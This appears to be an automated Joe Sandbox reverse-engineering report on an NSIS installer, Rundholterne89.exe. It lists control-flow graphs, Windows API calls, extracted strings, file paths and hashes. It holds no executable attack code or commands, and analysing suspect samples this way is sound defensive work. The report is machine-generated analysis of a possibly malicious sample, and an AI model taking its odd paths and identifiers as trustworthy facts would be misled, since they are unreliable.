290->320 321 403ce9-403d25 ShowWindow KiUserCallbackDispatcher call 403f36 EnableWindow 290->321 295 403b19-403b1a 291->295 296 403b1c-403b1f 291->296 292->272 292->291 298 403b4a-403b4f call 403eed 295->298 299 403b21-403b27 296->299 300 403b2d-403b32 296->300 298->285 301 403b68-403b7b SendMessageA 299->301 302 403b29-403b2b 299->302 300->301 303 403b34-403b3a 300->303 301->285 302->298 306 403b51-403b5a call 40140b 303->306 307 403b3c-403b42 call 40140b 303->307 306->285 317 403b5c-403b66 306->317 316 403b48 307->316 316->298 317->316 320->321 324 403d27-403d28 321->324 325 403d2a 321->325 326 403d2c-403d5a GetSystemMenu EnableMenuItem SendMessageA 324->326 325->326 327 403d5c-403d6d SendMessageA 326->327 328 403d6f 326->328 329 403d75-403dae call 403f49 call 405d2f lstrlenA call 405d51 SetWindowTextA call 401389 327->329 328->329 329->267 338 403db4-403db6 329->338 338->267 339 403dbc-403dc0 338->339 340 403dc2-403dc8 339->340 341 403ddf-403df3 DestroyWindow 339->341 340->272 342 403dce-403dd4 340->342 341->276 343 403df9-403e26 CreateDialogParamA 341->343 342->267 344 403dda 342->344 343->276 345 403e2c-403e83 call 403f14 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 343->345 344->272 345->272 350 403e85-403e98 ShowWindow call 403f60 345->350 352 403e9d 350->352 352->276
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A7D
                                                                                            • ShowWindow.USER32(?), ref: 00403A9A
                                                                                            • DestroyWindow.USER32 ref: 00403AAE
                                                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403ACA
                                                                                            • GetDlgItem.USER32(?,?), ref: 00403AEB
                                                                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AFF
                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403B06
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403BB4
                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00403BBE
                                                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403BD8
                                                                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C29
                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00403CCF
                                                                                            • ShowWindow.USER32(00000000,?), ref: 00403CF0
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D02
                                                                                            • EnableWindow.USER32(?,?), ref: 00403D1D
                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D33
                                                                                            • EnableMenuItem.USER32(00000000), ref: 00403D3A
                                                                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D52
                                                                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D65
                                                                                            • lstrlenA.KERNEL32(00429868,?,00429868,Hermandas Setup), ref: 00403D8E
                                                                                            • SetWindowTextA.USER32(?,00429868), ref: 00403D9D
                                                                                            • ShowWindow.USER32(?,0000000A), ref: 00403ED1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                            • String ID: Hermandas Setup
                                                                                            • API String ID: 3282139019-232963439
                                                                                            • Opcode ID: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                            • Instruction ID: 4996b7fab7fdeaebc033b1676f4cae353b3174fabf4a12f0715eb1af02f584c4
                                                                                            • Opcode Fuzzy Hash: fc27e82e98cabd3308fd2f89a2a423f79f43cd40c567b8a18826c7a47723085f
                                                                                            • Instruction Fuzzy Hash: 74C1B131A04205ABDB216F62ED85E2B7EBCFB4570AF40053EF501B11E1C739A942DB6E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 353 4036af-4036c7 call 4060c8 356 4036c9-4036d9 call 405c8d 353->356 357 4036db-40370c call 405c16 353->357 364 40372f-403758 call 403974 call 40588f 356->364 362 403724-40372a lstrcatA 357->362 363 40370e-40371f call 405c16 357->363 362->364 363->362 371 40375e-403763 364->371 372 4037df-4037e7 call 40588f 364->372 371->372 373 403765-403789 call 405c16 371->373 378 4037f5-40381a LoadImageA 372->378 379 4037e9-4037f0 call 405d51 372->379 373->372 380 40378b-40378d 373->380 382 40389b-4038a3 call 40140b 378->382 383 40381c-40384c RegisterClassA 378->383 379->378 385 40379e-4037aa lstrlenA 380->385 386 40378f-40379c call 4057cc 380->386 394 4038a5-4038a8 382->394 395 4038ad-4038b8 call 403974 382->395 387 403852-403896 SystemParametersInfoA CreateWindowExA 383->387 388 40396a 383->388 392 4037d2-4037da call 4057a1 call 405d2f 385->392 393 4037ac-4037ba lstrcmpiA 385->393 386->385 387->382 391 40396c-403973 388->391 392->372 393->392 398 4037bc-4037c6 GetFileAttributesA 393->398 394->391 406 403941-403949 call 40501a 395->406 407 4038be-4038d8 ShowWindow call 40605a 395->407 399 4037c8-4037ca 398->399 400 4037cc-4037cd call 4057e8 398->400 399->392 399->400 400->392 412 403963-403965 call 40140b 406->412 413 40394b-403951 406->413 414 4038e4-4038f6 GetClassInfoA 407->414 415 4038da-4038df call 40605a 407->415 412->388 413->394 416 403957-40395e call 40140b 413->416 419 4038f8-403908 GetClassInfoA RegisterClassA 414->419 420 40390e-403931 DialogBoxParamA call 40140b 414->420 415->414 416->394 419->420 424 403936-40393f call 4035ff 420->424 424->391
                                                                                            APIs
                                                                                              • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                              • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                            • lstrcatA.KERNEL32(1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rundholterne89.exe",00000000), ref: 0040372A
                                                                                            • lstrlenA.KERNEL32(C:\Users\user\Stanglorgnet.bro,?,?,?,C:\Users\user\Stanglorgnet.bro,00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,1033,00429868,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429868,00000000,00000002,774D3410), ref: 0040379F
                                                                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                                                            • GetFileAttributesA.KERNEL32(C:\Users\user\Stanglorgnet.bro), ref: 004037BD
                                                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian), ref: 00403806
                                                                                              • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                            • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                                            • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                                            • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                                            • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                            • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\Stanglorgnet.bro$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                            • API String ID: 1975747703-529818883
                                                                                            • Opcode ID: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                                            • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                                            • Opcode Fuzzy Hash: 394e4bb129311e5b6d6d20aedec098417f6b3d3145e2df1ac527dc8f8ff082cb
                                                                                            • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 427 402c66-402cb4 GetTickCount GetModuleFileNameA call 4059a2 430 402cc0-402cee call 405d2f call 4057e8 call 405d2f GetFileSize 427->430 431 402cb6-402cbb 427->431 439 402cf4 430->439 440 402ddb-402de9 call 402c02 430->440 432 402e98-402e9c 431->432 442 402cf9-402d10 439->442 446 402deb-402dee 440->446 447 402e3e-402e43 440->447 444 402d12 442->444 445 402d14-402d1d call 4030b1 442->445 444->445 453 402d23-402d2a 445->453 454 402e45-402e4d call 402c02 445->454 449 402df0-402e08 call 4030c7 call 4030b1 446->449 450 402e12-402e3c GlobalAlloc call 4030c7 call 402e9f 446->450 447->432 449->447 475 402e0a-402e10 449->475 450->447 474 402e4f-402e60 450->474 458 402da6-402daa 453->458 459 402d2c-402d40 call 40595d 453->459 454->447 463 402db4-402dba 458->463 464 402dac-402db3 call 402c02 458->464 459->463 478 402d42-402d49 459->478 469 402dc9-402dd3 463->469 470 402dbc-402dc6 call 40613d 463->470 464->463 469->442 473 402dd9 469->473 470->469 473->440 479 402e62 474->479 480 402e68-402e6d 474->480 475->447 475->450 478->463 482 402d4b-402d52 478->482 479->480 484 402e6e-402e74 480->484 482->463 483 402d54-402d5b 482->483 483->463 485 402d5d-402d64 483->485 484->484 486 402e76-402e91 SetFilePointer call 40595d 484->486 485->463 487 402d66-402d86 485->487 490 402e96 486->490 487->447 489 402d8c-402d90 487->489 491 402d92-402d96 489->491 492 402d98-402da0 489->492 490->432 491->473 491->492 492->463 493 402da2-402da4 492->493 493->463
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00402C77
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Rundholterne89.exe,00000400), ref: 00402C93
                                                                                              • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 004059A6
                                                                                              • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rundholterne89.exe,C:\Users\user\Desktop\Rundholterne89.exe,80000000,00000003), ref: 00402CDF
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                                            • soft, xrefs: 00402D54
                                                                                            • Inst, xrefs: 00402D4B
                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                                            • Null, xrefs: 00402D5D
                                                                                            • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                                            • Error launching installer, xrefs: 00402CB6
                                                                                            • C:\Users\user\Desktop\Rundholterne89.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                                            • "C:\Users\user\Desktop\Rundholterne89.exe", xrefs: 00402C66
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                            • String ID: "C:\Users\user\Desktop\Rundholterne89.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Rundholterne89.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                            • API String ID: 4283519449-1477234186
                                                                                            • Opcode ID: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                            • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                                            • Opcode Fuzzy Hash: 5f7c5d9e77a9b9c73338c6d1e92cd20f3f30bb0dbb8c708eeee72798782a561c
                                                                                            • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 625 402e9f-402eb3 626 402eb5 625->626 627 402ebc-402ec5 625->627 626->627 628 402ec7 627->628 629 402ece-402ed3 627->629 628->629 630 402ee3-402ef0 call 4030b1 629->630 631 402ed5-402ede call 4030c7 629->631 635 402ef6-402efa 630->635 636 40309f 630->636 631->630 637 402f00-402f49 GetTickCount 635->637 638 40304a-40304c 635->638 639 4030a1-4030a2 636->639 642 4030a7 637->642 643 402f4f-402f57 637->643 640 40308c-40308f 638->640 641 40304e-403051 638->641 644 4030aa-4030ae 639->644 645 403091 640->645 646 403094-40309d call 4030b1 640->646 641->642 647 403053 641->647 642->644 648 402f59 643->648 649 402f5c-402f6a call 4030b1 643->649 645->646 646->636 657 4030a4 646->657 651 403056-40305c 647->651 648->649 649->636 659 402f70-402f79 649->659 654 403060-40306e call 4030b1 651->654 655 40305e 651->655 654->636 663 403070-40307c call 405a49 654->663 655->654 657->642 660 402f7f-402f9f call 4061ab 659->660 667 403042-403044 660->667 668 402fa5-402fb8 GetTickCount 660->668 669 403046-403048 663->669 670 40307e-403088 663->670 667->639 671 402fba-402fc2 668->671 672 402ffd-402fff 668->672 669->639 670->651 673 40308a 670->673 674 402fc4-402fc8 671->674 675 402fca-402ffa MulDiv wsprintfA call 404f48 671->675 676 403001-403005 672->676 677 403036-40303a 672->677 673->642 674->672 674->675 675->672 680 403007-40300e call 405a49 676->680 681 40301c-403027 676->681 677->643 678 403040 677->678 678->642 686 403013-403015 680->686 682 40302a-40302e 681->682 682->660 685 403034 682->685 685->642 686->669 687 403017-40301a 686->687 687->682
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$wsprintf
                                                                                            • String ID: DA$ DA$... %d%%$DwA
                                                                                            • API String ID: 551687249-506594815
                                                                                            • Opcode ID: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                            • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                                            • Opcode Fuzzy Hash: 3c1c6048edc1f00d8c5e0ea3695652e11966b85d101879319fc20926b17e4e8a
                                                                                            • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 688 401751-401774 call 402a3a call 40580e 693 401776-40177c call 405d2f 688->693 694 40177e-401790 call 405d2f call 4057a1 lstrcatA 688->694 699 401795-40179b call 405f9a 693->699 694->699 704 4017a0-4017a4 699->704 705 4017a6-4017b0 call 406033 704->705 706 4017d7-4017da 704->706 713 4017c2-4017d4 705->713 714 4017b2-4017c0 CompareFileTime 705->714 708 4017e2-4017fe call 4059a2 706->708 709 4017dc-4017dd call 40597d 706->709 716 401800-401803 708->716 717 401876-40189f call 404f48 call 402e9f 708->717 709->708 713->706 714->713 719 401805-401847 call 405d2f * 2 call 405d51 call 405d2f call 405525 716->719 720 401858-401862 call 404f48 716->720 730 4018a1-4018a5 717->730 731 4018a7-4018b3 SetFileTime 717->731 719->704 752 40184d-40184e 719->752 732 40186b-401871 720->732 730->731 735 4018b9-4018c4 CloseHandle 730->735 731->735 733 4028d8 732->733 739 4028da-4028de 733->739 737 4018ca-4018cd 735->737 738 4028cf-4028d2 735->738 741 4018e2-4018e5 call 405d51 737->741 742 4018cf-4018e0 call 405d51 lstrcatA 737->742 738->733 748 4018ea-402273 call 405525 741->748 742->748 748->738 748->739 752->732 754 401850-401851 752->754 754->720
                                                                                            APIs
                                                                                            • lstrcatA.KERNEL32(00000000,00000000,%Churrasco241%\mistrusted\Undreadful,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,00000031), ref: 00401790
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,%Churrasco241%\mistrusted\Undreadful,%Churrasco241%\mistrusted\Undreadful,00000000,00000000,%Churrasco241%\mistrusted\Undreadful,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,00000031), ref: 004017BA
                                                                                              • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Hermandas Setup,NSIS Error), ref: 00405D3C
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,774D23A0), ref: 00404FA4
                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: %Churrasco241%\mistrusted\Undreadful$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\Stanglorgnet.bro
                                                                                            • API String ID: 1941528284-137748297
                                                                                            • Opcode ID: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                                            • Instruction ID: 9fffb686f64fba45267de9fcbed8a5438fb589d34f2a074259106400a528bed4
                                                                                            • Opcode Fuzzy Hash: 4f9644c0113f451ee2cb14cf97c87bd5b67e16b7d88c3abb121216c9f25fe8f5
                                                                                            • Instruction Fuzzy Hash: 1041B831900519BBDF107BA5DC85EAF3679DF45368B60863BF121F11E1D63C8A418A6D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 755 40540e-405459 CreateDirectoryA 756 40545b-40545d 755->756 757 40545f-40546c GetLastError 755->757 758 405486-405488 756->758 757->758 759 40546e-405482 SetFileSecurityA 757->759 759->756 760 405484 GetLastError 759->760 760->758
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                            • GetLastError.KERNEL32 ref: 00405465
                                                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                                            • GetLastError.KERNEL32 ref: 00405484
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                            • API String ID: 3449924974-1471963312
                                                                                            • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                            • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                                            • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                            • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 761 40605a-40607a GetSystemDirectoryA 762 40607c 761->762 763 40607e-406080 761->763 762->763 764 406090-406092 763->764 765 406082-40608a 763->765 767 406093-4060c5 wsprintfA LoadLibraryExA 764->767 765->764 766 40608c-40608e 765->766 766->767
                                                                                            APIs
                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406071
                                                                                            • wsprintfA.USER32 ref: 004060AA
                                                                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004060BE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
